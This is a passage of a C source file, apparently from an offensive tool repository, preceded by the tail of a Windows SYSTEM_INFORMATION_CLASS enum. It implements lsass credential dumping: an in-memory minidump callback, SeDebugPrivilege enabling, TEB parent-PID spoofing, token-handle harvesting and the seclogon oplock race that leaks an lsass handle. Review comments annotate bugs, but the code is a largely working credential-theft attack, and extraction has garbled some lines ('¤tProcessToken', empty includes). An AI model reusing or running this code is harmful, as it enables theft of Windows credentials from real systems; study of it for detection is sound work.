SystemVirtualAddressInformation, // q: SYSTEM_VA_LIST_INFORMATION[]; s: SYSTEM_VA_LIST_INFORMATION[] (requires SeIncreaseQuotaPrivilege) // MmQuerySystemVaInformation 436 | SystemLogicalProcessorAndGroupInformation, // q: SYSTEM_LOGICAL_PROCESSOR_INFORMATION_EX 
// since WIN7 // KeQueryLogicalProcessorRelationship 437 | SystemProcessorCycleTimeInformation, // q: SYSTEM_PROCESSOR_CYCLE_TIME_INFORMATION[] 438 | SystemStoreInformation, // q; s // SmQueryStoreInformation 439 | SystemRegistryAppendString, // 110, s: SYSTEM_REGISTRY_APPEND_STRING_PARAMETERS 440 | SystemAitSamplingValue, // s: ULONG (requires SeProfileSingleProcessPrivilege) 441 | SystemVhdBootInformation, // q: SYSTEM_VHD_BOOT_INFORMATION 442 | SystemCpuQuotaInformation, // q; s // PsQueryCpuQuotaInformation 443 | SystemNativeBasicInformation, // not implemented 444 | SystemSpare1, // not implemented 445 | SystemLowPriorityIoInformation, // q: SYSTEM_LOW_PRIORITY_IO_INFORMATION 446 | SystemTpmBootEntropyInformation, // q: TPM_BOOT_ENTROPY_NT_RESULT // ExQueryTpmBootEntropyInformation 447 | SystemVerifierCountersInformation, // q: SYSTEM_VERIFIER_COUNTERS_INFORMATION 448 | SystemPagedPoolInformationEx, // q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypePagedPool) 449 | SystemSystemPtesInformationEx, // 120, q: SYSTEM_FILECACHE_INFORMATION; s (requires SeIncreaseQuotaPrivilege) (info for WorkingSetTypeSystemPtes) 450 | SystemNodeDistanceInformation, // q 451 | SystemAcpiAuditInformation, // q: SYSTEM_ACPI_AUDIT_INFORMATION // HaliQuerySystemInformation -> HalpAuditQueryResults, info class 26 452 | SystemBasicPerformanceInformation, // q: SYSTEM_BASIC_PERFORMANCE_INFORMATION // name:wow64:whNtQuerySystemInformation_SystemBasicPerformanceInformation 453 | SystemQueryPerformanceCounterInformation, // q: SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // since WIN7 SP1 454 | SystemSessionBigPoolInformation, // since WIN8 455 | SystemBootGraphicsInformation, 456 | SystemScrubPhysicalMemoryInformation, 457 | SystemBadPageInformation, 458 | SystemProcessorProfileControlArea, 459 | SystemCombinePhysicalMemoryInformation, // 130 460 | SystemEntropyInterruptTimingCallback, 461 | SystemConsoleInformation, 462 | 
SystemPlatformBinaryInformation, 463 | SystemThrottleNotificationInformation, 464 | SystemHypervisorProcessorCountInformation, 465 | SystemDeviceDataInformation, 466 | SystemDeviceDataEnumerationInformation, 467 | SystemMemoryTopologyInformation, 468 | SystemMemoryChannelInformation, 469 | SystemBootLogoInformation, // 140 470 | SystemProcessorPerformanceInformationEx, // q: SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // since WINBLUE 471 | SystemSpare0, 472 | SystemSecureBootPolicyInformation, 473 | SystemPageFileInformationEx, // q: SYSTEM_PAGEFILE_INFORMATION_EX 474 | SystemSecureBootInformation, 475 | SystemEntropyInterruptTimingRawInformation, 476 | SystemPortableWorkspaceEfiLauncherInformation, 477 | SystemFullProcessInformation, // q: SYSTEM_PROCESS_INFORMATION with SYSTEM_PROCESS_INFORMATION_EXTENSION (requires admin) 478 | SystemKernelDebuggerInformationEx, // q: SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX 479 | SystemBootMetadataInformation, // 150 480 | SystemSoftRebootInformation, 481 | SystemElamCertificateInformation, 482 | SystemOfflineDumpConfigInformation, 483 | SystemProcessorFeaturesInformation, // q: SYSTEM_PROCESSOR_FEATURES_INFORMATION 484 | SystemRegistryReconciliationInformation, 485 | SystemEdidInformation, 486 | SystemManufacturingInformation, // q: SYSTEM_MANUFACTURING_INFORMATION // since THRESHOLD 487 | SystemEnergyEstimationConfigInformation, // q: SYSTEM_ENERGY_ESTIMATION_CONFIG_INFORMATION 488 | SystemHypervisorDetailInformation, // q: SYSTEM_HYPERVISOR_DETAIL_INFORMATION 489 | SystemProcessorCycleStatsInformation, // q: SYSTEM_PROCESSOR_CYCLE_STATS_INFORMATION // 160 490 | SystemVmGenerationCountInformation, 491 | SystemTrustedPlatformModuleInformation, // q: SYSTEM_TPM_INFORMATION 492 | SystemKernelDebuggerFlags, 493 | SystemCodeIntegrityPolicyInformation, 494 | SystemIsolatedUserModeInformation, 495 | SystemHardwareSecurityTestInterfaceResultsInformation, 496 | SystemSingleModuleInformation, // q: SYSTEM_SINGLE_MODULE_INFORMATION 497 | 
SystemAllowedCpuSetsInformation,
SystemDmaProtectionInformation,
SystemInterruptCpuSetsInformation,
SystemSecureBootPolicyFullInformation,
SystemCodeIntegrityPolicyFullInformation,
SystemAffinitizedInterruptProcessorInformation,
SystemRootSiloInformation, // q: SYSTEM_ROOT_SILO_INFORMATION
MaxSystemInfoClass
} SYSTEM_INFORMATION_CLASS;
-------------------------------------------------------------------------------- /Beacon/DunpHash.c: --------------------------------------------------------------------------------

/*
 * DunpHash.c -- helpers for capturing a minidump of the credential store
 * (lsass) in memory.  What is visible here: a MiniDumpWriteDump callback that
 * copies each chunk into gDumpBuffer (MinidumpCallbackRoutine); privilege
 * helpers (SetPrivilege, EnableDebugPrivilege, EnableImpersonatePrivilege);
 * parent-PID spoofing by rewriting the current thread's TEB ClientId
 * (SpoofPidTeb / RestoreOriginalPidTeb); the seclogon oplock race
 * (CreateFileLock, LeakLsassHandleInSeclogonWithRaceCondition,
 * MalSeclogonPPIDSpoofing); and object-type lookup helpers
 * (QueryObjectTypesInfo, GetTypeIndexByName).  The code that actually calls
 * MiniDumpWriteDump and allocates gDumpBuffer is not in this view.
 *
 * Review notes that apply file-wide: almost no Win32 return value is checked
 * (OpenProcessToken, CreateFile, CreateEvent, CreateThread, HeapAlloc,
 * malloc); several helpers call exit(-1) on failure; and every
 * realloc/HeapReAlloc overwrites the only pointer to the old block, so an
 * allocation failure leaks it.  GetLastError() is printed with %d in several
 * places although it returns a DWORD (%lu would match).
 */
#include "windows.h"
#include "stdio.h"
// NOTE(review): the angle-bracket header names of the next two #include
// lines were lost in extraction (they render as a bare "#include"); see the
// repository file for the real names.
#include 
#include 
#include "ntdef.h"
#include "Util.h"


// Destination buffer for the in-memory minidump; MinidumpCallbackRoutine
// writes each chunk at Io.Offset.  Allocated elsewhere (not in this view);
// presumably sized MAX_LSASS_DMP_SIZE -- confirm against the caller.
LPVOID gDumpBuffer = NULL;
// Running total of bytes copied into gDumpBuffer by the callback.
DWORD gBytesRead = 0;
// 300 MiB (300 * 1024 * 1024).  Not referenced anywhere in this view.
#define MAX_LSASS_DMP_SIZE 314572800

void RestoreOriginalPidTeb(DWORD originalPid, DWORD originalTid);

/*
 * MiniDumpWriteDump callback that keeps the dump in memory instead of on
 * disk: each IoWriteAllCallback chunk is copied to gDumpBuffer + Io.Offset.
 *
 * CallbackParam  - unused here.
 * callbackInput  - callback type plus, for I/O callbacks, the chunk
 *                  (Io.Buffer, Io.Offset, Io.BufferBytes).
 * callbackOutput - receives the Status the dump engine acts on.
 * Returns TRUE on every path (including the default case), so the dump is
 * never aborted from this callback.
 *
 * NOTE(review): nothing checks that Io.Offset + Io.BufferBytes stays inside
 * gDumpBuffer's allocation, and gDumpBuffer == NULL is not handled;
 * RtlCopyMemory trusts the engine-supplied offset and length.
 */
BOOL MinidumpCallbackRoutine(PVOID CallbackParam, PMINIDUMP_CALLBACK_INPUT callbackInput, PMINIDUMP_CALLBACK_OUTPUT callbackOutput) {
    LPVOID destination = 0, source = 0;
    DWORD bufferSize = 0;

    switch (callbackInput->CallbackType)
    {
    case IoStartCallback:
        // S_FALSE here presumably tells the dump engine to route writes
        // through IoWriteAllCallback instead of the file handle -- confirm
        // against the MiniDumpWriteDump callback documentation.
        callbackOutput->Status = S_FALSE;
        break;

        // Gets called for each lsass process memory read operation
    case IoWriteAllCallback:
        callbackOutput->Status = S_OK;

        // A chunk of minidump data that's just been read from lsass.
        // This is the data that would eventually end up in the .dmp file on the disk, but we now have access to it in memory, so we can do whatever we want with it.
        // We will simply save it to dumpBuffer.
        source = callbackInput->Io.Buffer;

        // Calculate location of where we want to store this part of the dump.
        // Destination is start of our dumpBuffer + the offset of the minidump data
        destination = (LPVOID)((DWORD_PTR)gDumpBuffer + (DWORD_PTR)callbackInput->Io.Offset);

        // Size of the chunk of minidump that's just been read.
        bufferSize = callbackInput->Io.BufferBytes;
        gBytesRead += bufferSize;

        RtlCopyMemory(destination, source, bufferSize);

        //printf("[+] Minidump offset: 0x%x; length: 0x%x\n", callbackInput->Io.Offset, bufferSize);
        break;

    case IoFinishCallback:
        callbackOutput->Status = S_OK;
        break;

    default:
        return TRUE;
    }
    return TRUE;
}

/*
 * Enables SeDebugPrivilege on the current process token.
 *
 * enforceCheck - when TRUE, a failure to enable the privilege prints a
 *                message and terminates the process with exit(-1); when
 *                FALSE the failure is silently ignored.
 *
 * NOTE(review): the OpenProcessToken result is not checked, so on failure
 * SetPrivilege/CloseHandle run on a NULL handle.  "¤tProcessToken" is an
 * extraction artefact of "&currentProcessToken" (the HTML entity &curren;).
 * SetPrivilege is called before its definition below; presumably it is
 * declared in Util.h -- confirm.
 */
void EnableDebugPrivilege(BOOL enforceCheck) {
    HANDLE currentProcessToken = NULL;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, ¤tProcessToken);
    BOOL setPrivilegeSuccess = SetPrivilege(currentProcessToken, L"SeDebugPrivilege", TRUE);
    if (enforceCheck && !setPrivilegeSuccess) {
        printf("SetPrivilege failed to enable SeDebugPrivilege. Run it as an Administrator. Exiting...\n");
        exit(-1);
    }
    CloseHandle(currentProcessToken);
}

/*
 * Enables or disables one named privilege on hToken and then verifies that
 * it is actually enabled.
 *
 * hToken           - token to adjust (needs TOKEN_ADJUST_PRIVILEGES and
 *                    TOKEN_QUERY; the callers open it with TOKEN_ALL_ACCESS).
 * lpszPrivilege    - privilege name, e.g. L"SeDebugPrivilege".
 * bEnablePrivilege - TRUE to set SE_PRIVILEGE_ENABLED, FALSE to clear it.
 * Returns TRUE only when PrivilegeCheck afterwards reports the privilege
 * enabled; FALSE on any API failure or if the privilege is still disabled.
 *
 * Why the trailing PrivilegeCheck: AdjustTokenPrivileges can return TRUE
 * without assigning the privilege (ERROR_NOT_ALL_ASSIGNED when the token
 * does not hold it), so success is confirmed by querying the token.
 * Note that with bEnablePrivilege == FALSE this still returns FALSE
 * (the check asks for SE_PRIVILEGE_ENABLED) even when disabling succeeded.
 */
BOOL SetPrivilege(HANDLE hToken, wchar_t* lpszPrivilege, BOOL bEnablePrivilege)
{
    TOKEN_PRIVILEGES tp;
    PRIVILEGE_SET privs;
    LUID luid;
    BOOL debugPrivEnabled = FALSE;
    if (!LookupPrivilegeValueW(NULL, lpszPrivilege, &luid))
    {
        printf("LookupPrivilegeValueW() failed, error %u\n", GetLastError());
        return FALSE;
    }
    tp.PrivilegeCount = 1;
    //tp.Privileges[0].Luid = luid;
    memcpy(&tp.Privileges[0].Luid, &luid, sizeof(LUID));
    if (bEnablePrivilege)
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    else
        tp.Privileges[0].Attributes = 0;
    if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
    {
        printf("AdjustTokenPrivileges() failed, error %u\n", GetLastError());
        return FALSE;
    }
    privs.PrivilegeCount = 1;
    privs.Control = PRIVILEGE_SET_ALL_NECESSARY;
    //privs.Privilege[0].Luid = luid;
    memcpy(&privs.Privilege[0].Luid, &luid, sizeof(LUID));
    privs.Privilege[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!PrivilegeCheck(hToken, &privs, &debugPrivEnabled)) {
        printf("PrivilegeCheck() failed, error %u\n", GetLastError());
        return FALSE;
    }
    if (!debugPrivEnabled)
        return FALSE;
    return TRUE;
}
/*
 * Returns the PID of the first process that has processBinaryPath open,
 * using NtQueryInformationFile(FileProcessIdsUsingFileInformation); 0 if
 * the file cannot be opened or no process is using it.
 *
 * processBinaryPath - path of the executable (or any file) to look up.
 *
 * The query buffer starts at 8192 bytes and grows by 8192 while the call
 * returns STATUS_INFO_LENGTH_MISMATCH.
 *
 * NOTE(review): the local "int FileProcessIdsUsingFileInformation = 47"
 * shadows the enumerator of the same name and value declared in ntdef.h's
 * FILE_INFORMATION_CLASS.  HeapAlloc/HeapReAlloc results are not checked,
 * and HeapReAlloc overwrites the only pointer to the old block.  The
 * LoadLibrary handle is never released (ntdll is always mapped, so this is
 * only a reference-count leak).
 */
DWORD GetPidUsingFilePath(wchar_t* processBinaryPath) {
    DWORD retPid = 0;
    IO_STATUS_BLOCK iosb;
    HANDLE hFile;
    PFILE_PROCESS_IDS_USING_FILE_INFORMATION pfpiufi = NULL;
    int FileProcessIdsUsingFileInformation = 47;
    ULONG pfpiufiLen = 0;
    PULONG_PTR processIdListPtr = NULL;
    NTSTATUS status = 0;
    pNtQueryInformationFile NtQueryInformationFile = (pNtQueryInformationFile)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQueryInformationFile");
    hFile = CreateFile(processBinaryPath, FILE_READ_ATTRIBUTES, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, 0, NULL);
    if (hFile != INVALID_HANDLE_VALUE)
    {
        pfpiufiLen = 8192;
        pfpiufi = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pfpiufiLen);
        status = NtQueryInformationFile(hFile, &iosb, pfpiufi, pfpiufiLen, (FILE_INFORMATION_CLASS)FileProcessIdsUsingFileInformation);
        while (status == STATUS_INFO_LENGTH_MISMATCH) {
            pfpiufiLen = pfpiufiLen + 8192;
            pfpiufi = (PFILE_PROCESS_IDS_USING_FILE_INFORMATION)HeapReAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, pfpiufi, pfpiufiLen);
            status = NtQueryInformationFile(hFile, &iosb, pfpiufi, pfpiufiLen, (FILE_INFORMATION_CLASS)FileProcessIdsUsingFileInformation);
        }
        // NOTE(review): pfpiufi is read even when the final status is a
        // failure other than STATUS_INFO_LENGTH_MISMATCH; the buffer is
        // zero-initialised, so NumberOfProcessIdsInList is then 0.
        processIdListPtr = pfpiufi->ProcessIdList;
        // we return only the first pid, it's usually the right one
        if (pfpiufi->NumberOfProcessIdsInList >= 1)
            retPid = *processIdListPtr;
        HeapFree(GetProcessHeap(), 0, pfpiufi);
        CloseHandle(hFile);
    }
    return retPid;
}

/*
 * Rewrites the calling thread's TEB ClientId so that UniqueProcess reads as
 * spoofedPid while UniqueThread keeps the real thread id.  The real pid and
 * tid are returned through originalPid/originalTid so RestoreOriginalPidTeb
 * can undo the change.
 *
 * spoofedPid  - pid to store in TEB->ClientId.UniqueProcess.
 * originalPid - out: GetCurrentProcessId() before the change.
 * originalTid - out: GetCurrentThreadId() before the change.
 *
 * Only the user-mode TEB copy is changed; the kernel's view of the process
 * is presumably unaffected, so this only influences code that reads the pid
 * from the TEB -- confirm.  oldProtection/oldProtection2 are unused.
 */
void SpoofPidTeb(DWORD spoofedPid, PDWORD originalPid, PDWORD originalTid) {
    CLIENT_ID CSpoofedPid;
    DWORD oldProtection, oldProtection2;
    *originalPid = GetCurrentProcessId();
    *originalTid = GetCurrentThreadId();
    CLIENT_ID* pointerToTebPid = &(NtCurrentTeb()->ClientId);
    CSpoofedPid.UniqueProcess = (HANDLE)spoofedPid;
    CSpoofedPid.UniqueThread = (HANDLE)*originalTid;
    memcpy(pointerToTebPid, &CSpoofedPid, sizeof(CLIENT_ID));
}
/*
 * Walks the system handle table (SystemHandleInformation) and collects the
 * handle values of every "Token" object held by targetPid.
 *
 * targetPid       - process whose handle table entries are selected.
 * tokenHandles    - out: receives the raw HandleValue of each match.  These
 *                   are values from targetPid's handle table, not handles
 *                   of the current process.
 * tokenHandlesLen - in/out: index at which to start appending; incremented
 *                   once per match.
 *
 * The object type index for "Token" comes from GetTypeIndexByName; the
 * snapshot buffer starts at 0x10000 bytes and doubles while
 * NtQuerySystemInformation reports STATUS_INFO_LENGTH_MISMATCH.
 *
 * NOTE(review): there is no capacity parameter for tokenHandles; the only
 * caller in this view passes an 8192-entry array and nothing stops the loop
 * from writing past it.  malloc is unchecked, realloc overwrites the only
 * pointer to the old block, and a GetTypeIndexByName failure terminates the
 * process with exit(-1).
 */
void FindTokenHandlesInProcess(DWORD targetPid, HANDLE* tokenHandles, PDWORD tokenHandlesLen)
{
    PSYSTEM_HANDLE_INFORMATION handleInfo = NULL;
    DWORD handleInfoSize = 0x10000;
    NTSTATUS status;
    ULONG processTypeIndex;
    UNICODE_STRING processTypeName = RTL_CONSTANT_STRING(L"Token");
    status = GetTypeIndexByName(&processTypeName, &processTypeIndex);
    if (!NT_SUCCESS(status)) {
        printf("GetTypeIndexByName failed 0x%08x\n", status);
        exit(-1);
    }
    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQuerySystemInformation");
    handleInfo = (PSYSTEM_HANDLE_INFORMATION)malloc(handleInfoSize);
    while ((status = NtQuerySystemInformation(SystemHandleInformation, handleInfo, handleInfoSize, NULL)) == STATUS_INFO_LENGTH_MISMATCH)
        handleInfo = (PSYSTEM_HANDLE_INFORMATION)realloc(handleInfo, handleInfoSize *= 2);
    // NOTE(review): any other failing status is ignored and the loop below
    // reads handleInfo->HandleCount from a buffer the call did not fill.
    for (DWORD i = 0; i < handleInfo->HandleCount; i++) {
        if (handleInfo->Handles[i].ObjectTypeIndex == processTypeIndex && handleInfo->Handles[i].UniqueProcessId == targetPid) {
            tokenHandles[*tokenHandlesLen] = (HANDLE)handleInfo->Handles[i].HandleValue;
            *tokenHandlesLen = *tokenHandlesLen + 1;
        }
    }
    free(handleInfo);
}
/*
 * Enables SeImpersonatePrivilege on the current process token.
 * Returns the SetPrivilege result (TRUE only if the privilege is now enabled).
 *
 * NOTE(review): same unchecked OpenProcessToken and "¤tProcessToken"
 * extraction artefact ("&currentProcessToken") as in EnableDebugPrivilege.
 */
BOOL EnableImpersonatePrivilege() {
    HANDLE currentProcessToken = NULL;
    OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, ¤tProcessToken);
    BOOL setPrivilegeSuccess = SetPrivilege(currentProcessToken, L"SeImpersonatePrivilege", TRUE);
    CloseHandle(currentProcessToken);
    return setPrivilegeSuccess;
}
/*
 * Creates a process through seclogon while this thread's TEB pid is spoofed
 * to "pid" (SpoofPidTeb), so the new process appears to be a child of pid.
 *
 * pid     - pid to impersonate as the parent and to scan for Token handles.
 * cmdline - command line passed to CreateProcessWithTokenW /
 *           CreateProcessWithLogonW (mutable wchar_t*, as those APIs require).
 *
 * Flow: enable SeDebugPrivilege (failure ignored), spoof the TEB pid, then
 * (a) if SeImpersonatePrivilege can be enabled and pid holds at least one
 * Token handle, try CreateProcessWithTokenW with each collected handle
 * value until one succeeds; otherwise (b) fall back to
 * CreateProcessWithLogonW with constant credentials and
 * LOGON_NETCREDENTIALS_ONLY (the credentials are not validated locally
 * with that logon flag).  The TEB pid is restored before returning on
 * every path.
 *
 * NOTE(review): tokenHandles is 8192 HANDLEs on the stack (64 KiB on x64);
 * startInfo.cb is left 0 after RtlZeroMemory (the Win32 contract normally
 * wants sizeof(STARTUPINFO)); procInfo handles are deliberately not closed
 * -- see the inline comments, which explain they do not belong to this
 * process.
 */
void MalSeclogonPPIDSpoofing(int pid, wchar_t* cmdline)
{
    PROCESS_INFORMATION procInfo;
    STARTUPINFO startInfo;
    DWORD originalPid, originalTid;
    HANDLE tokenHandles[8192];
    DWORD tokenHandlesCount = 0;
    BOOL useCreateProcessWithToken = FALSE;
    BOOL processCreatedWithToken = FALSE;
    EnableDebugPrivilege(FALSE);
    SpoofPidTeb((DWORD)pid, &originalPid, &originalTid);
    RtlZeroMemory(&procInfo, sizeof(PROCESS_INFORMATION));
    RtlZeroMemory(&startInfo, sizeof(STARTUPINFO));
    if (EnableImpersonatePrivilege()) {
        FindTokenHandlesInProcess(pid, tokenHandles, &tokenHandlesCount);
        if (tokenHandlesCount < 1) {
            printf("No token handles found in process %d, can't use CreateProcessWithToken(). Reverting to CreateProcessWithLogon()...\n", pid);
            useCreateProcessWithToken = FALSE;
        }
        else
            useCreateProcessWithToken = TRUE;
    }
    else {
        printf("Impersonation privileges not available, can't use CreateProcessWithToken(). Reverting to CreateProcessWithLogon()...\n");
        useCreateProcessWithToken = FALSE;
    }
    if (useCreateProcessWithToken) {
        // Each entry is a raw handle value from pid's table (see
        // FindTokenHandlesInProcess); the first one that works wins.
        for (DWORD i = 0; i < tokenHandlesCount; i++) {
            if (CreateProcessWithTokenW(tokenHandles[i], 0, NULL, cmdline, 0, NULL, NULL, &startInfo, &procInfo)) {
                processCreatedWithToken = TRUE;
                break;
            }
        }
        if (processCreatedWithToken) {
            // the returned handles in procInfo are wrong and duped into the spoofed parent process, so we can't close handles or wait for process end.
            printf("Spoofed process %S created correctly as child of PID %d using CreateProcessWithTokenW()!", cmdline, pid);
        }
        else {
            // NOTE(review): only the last failure's GetLastError is reported.
            printf("CreateProcessWithTokenW() failed with error code %d \n", GetLastError());
        }
    }
    else {
        if (!CreateProcessWithLogonW(L"MalseclogonUser", L"MalseclogonDomain", L"MalseclogonPwd", LOGON_NETCREDENTIALS_ONLY, NULL, cmdline, 0, NULL, NULL, &startInfo, &procInfo)) {
            printf("CreateProcessWithLogonW() failed with error code %d \n", GetLastError());

        }
        else {
            // the returned handles in procInfo are wrong and duped into the spoofed parent process, so we can't close handles or wait for process end.
            printf("Spoofed process %S created correctly as child of PID %d using CreateProcessWithLogonW()!", cmdline, pid);
        }
    }
    RestoreOriginalPidTeb(originalPid, originalTid);
}

/*
 * Thread entry point: unpacks a THREAD_PARAMETERS (pid, cmdline; declared in
 * ntdef.h) and runs MalSeclogonPPIDSpoofing on this thread.  Always returns 0.
 *
 * lpParam - THREAD_PARAMETERS*, owned by the caller and read only at start.
 */
DWORD WINAPI ThreadSeclogonLock(LPVOID lpParam) {
    THREAD_PARAMETERS* thread_params = (THREAD_PARAMETERS*)lpParam;
    MalSeclogonPPIDSpoofing(thread_params->pid, thread_params->cmdline);
    return 0;
}

// credits to @tirannido
// took from --> https://github.com/googleprojectzero/symboliclink-testing-tools/blob/main/CommonUtils/FileOpLock.cpp
/*
 * Requests a cache-read + cache-handle oplock on hFile asynchronously
 * (FSCTL_REQUEST_OPLOCK with the caller's OVERLAPPED).  The request is
 * expected to stay pending (ERROR_IO_PENDING); it completes later, when
 * another opener breaks the oplock, and the caller observes that through
 * GetOverlappedResult.
 *
 * hFile      - must have been opened with FILE_FLAG_OVERLAPPED.
 * overlapped - OVERLAPPED whose hEvent the caller has initialised.
 * Terminates the process with exit(-1) on any error other than
 * ERROR_IO_PENDING.
 *
 * NOTE(review): the DeviceIoControl return value is ignored and
 * GetLastError is read unconditionally, so a synchronous success (return
 * TRUE) would be reported as a failure with a stale error code.
 */
void CreateFileLock(HANDLE hFile, LPOVERLAPPED overlapped) {
    REQUEST_OPLOCK_INPUT_BUFFER inputBuffer;
    REQUEST_OPLOCK_OUTPUT_BUFFER outputBuffer;
    inputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
    inputBuffer.StructureLength = sizeof(inputBuffer);
    inputBuffer.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
    inputBuffer.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
    outputBuffer.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
    outputBuffer.StructureLength = sizeof(outputBuffer);
    DeviceIoControl(hFile, FSCTL_REQUEST_OPLOCK, &inputBuffer, sizeof(inputBuffer), &outputBuffer, sizeof(outputBuffer), NULL, overlapped);
    DWORD err = GetLastError();
    if (err != ERROR_IO_PENDING) {
        printf("Oplock Failed %d\n", err);
        exit(-1);
    }
}

/*
 * Takes an oplock on C:\Windows\System32\license.rtf, starts a worker
 * thread that runs MalSeclogonPPIDSpoofing(lsassPid, <that same path>), and
 * blocks in GetOverlappedResult until the oplock breaks.  Per the inline
 * comment, the break is expected to come from seclogon opening the file
 * while servicing the process-creation request, at which point the worker
 * (and seclogon) are stalled.  Returns after printing a status line;
 * the worker thread is left running.
 *
 * lsassPid - pid passed through THREAD_PARAMETERS to the worker.
 *
 * NOTE(review): CreateFile, CreateEvent and CreateThread results are not
 * checked, the thread handle, event and hFile are never closed, and
 * thread_params/fileToLock are stack locals that the worker keeps
 * referencing after this function returns -- their lifetime presumably
 * relies on the caller staying alive; confirm.  On a failed
 * GetOverlappedResult the process exits with -1.
 */
void LeakLsassHandleInSeclogonWithRaceCondition(DWORD lsassPid) {
    wchar_t fileToLock[] = L"C:\\Windows\\System32\\license.rtf";
    OVERLAPPED overlapped;
    DWORD dwBytes;
    THREAD_PARAMETERS thread_params;
    HANDLE hFile = CreateFile(fileToLock, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED, NULL);
    overlapped.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
    CreateFileLock(hFile, &overlapped);
    thread_params.pid = lsassPid;
    // The locked file's path doubles as the command line handed to seclogon.
    thread_params.cmdline = fileToLock;
    // we need to run CreateProcessWithToken() in a separate thread because the file lock would also lock our thread
    CreateThread(NULL, 0, ThreadSeclogonLock, (LPVOID)&thread_params, 0, NULL);
    // this call will halt the current thread until someone will access the locked file. We expect seclogon trying to access license.rtf when calling CreateProcessAsUser()
    if (!GetOverlappedResult(hFile, &overlapped, &dwBytes, TRUE)) {
        printf("Oplock Failed. Exiting...\n");
        exit(-1);
    }
    printf("Seclogon thread locked. A lsass handle will be available inside the seclogon process!\n");


}

/*
 * Undoes SpoofPidTeb: writes originalPid/originalTid back into the calling
 * thread's TEB ClientId.
 *
 * originalPid - value saved by SpoofPidTeb.
 * originalTid - value saved by SpoofPidTeb.
 *
 * oldProtection/oldProtection2 are unused.
 */
void RestoreOriginalPidTeb(DWORD originalPid, DWORD originalTid) {
    CLIENT_ID CRealPid;
    DWORD oldProtection, oldProtection2;
    CLIENT_ID* pointerToTebPid = &(NtCurrentTeb()->ClientId);
    CRealPid.UniqueProcess = (HANDLE)originalPid;
    CRealPid.UniqueThread = (HANDLE)originalTid;
    memcpy(pointerToTebPid, &CRealPid, sizeof(CLIENT_ID));
}

/*
 * TRUE if szPath exists and is not a directory; FALSE otherwise (including
 * when GetFileAttributes fails for any reason, e.g. access denied).
 *
 * szPath - path in the project's TCHAR encoding (GetFileAttributes resolves
 *          to the W or A variant depending on UNICODE).
 */
BOOL FileExists(LPCTSTR szPath)
{
    DWORD dwAttrib = GetFileAttributes(szPath);
    return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
}

/*
 * Retrieves the object-type table via NtQueryObject(NULL,
 * ObjectTypesInformation).
 *
 * TypesInfo - out: on success receives a malloc'd OBJECT_TYPES_INFORMATION
 *             the caller must free(); set to NULL on entry and left NULL on
 *             failure.
 * Returns the NTSTATUS of the last NtQueryObject call, or
 * STATUS_INSUFFICIENT_RESOURCES if malloc fails.
 *
 * The buffer starts at 0x1000 bytes; on STATUS_INFO_LENGTH_MISMATCH it is
 * freed and re-allocated with the length NtQueryObject returned
 * (BufferLength is passed as the ReturnLength out-parameter).
 */
NTSTATUS QueryObjectTypesInfo(__out POBJECT_TYPES_INFORMATION* TypesInfo) {
    NTSTATUS Status;
    ULONG BufferLength = 0x1000;
    PVOID Buffer;
    pNtQueryObject NtQueryObject = (pNtQueryObject)GetProcAddress(LoadLibrary(L"ntdll.dll"), "NtQueryObject");
    *TypesInfo = NULL;
    do {
        Buffer = malloc(BufferLength);
        if (Buffer == NULL)
            return (NTSTATUS)STATUS_INSUFFICIENT_RESOURCES;
        Status = NtQueryObject(NULL, ObjectTypesInformation, Buffer, BufferLength, &BufferLength);
        if (NT_SUCCESS(Status)) {
            *TypesInfo = Buffer;
            return Status;
        }
        free(Buffer);
    } while (Status == STATUS_INFO_LENGTH_MISMATCH);
    return Status;
}

/*
 * Looks up the object-type index for TypeName (e.g. L"Token") by scanning
 * the table returned by QueryObjectTypesInfo and comparing names with
 * RtlCompareUnicodeString.  *TypeIndex is reset to 0 on entry.
 * The body continues beyond this view.
 */
NTSTATUS GetTypeIndexByName(__in PCUNICODE_STRING TypeName, __out PULONG TypeIndex) {
    NTSTATUS Status;
    POBJECT_TYPES_INFORMATION ObjectTypes;
    POBJECT_TYPE_INFORMATION_V2 CurrentType;
    *TypeIndex = 0;
    pRtlCompareUnicodeString RtlCompareUnicodeString = (pRtlCompareUnicodeString)GetProcAddress(LoadLibrary(L"ntdll.dll"), "RtlCompareUnicodeString");
    Status = QueryObjectTypesInfo(&ObjectTypes);
    if (!NT_SUCCESS(Status)) {
        printf("QueryObjectTypesInfo failed: 0x%08x\n", Status);
        return Status;
    }
    CurrentType = 
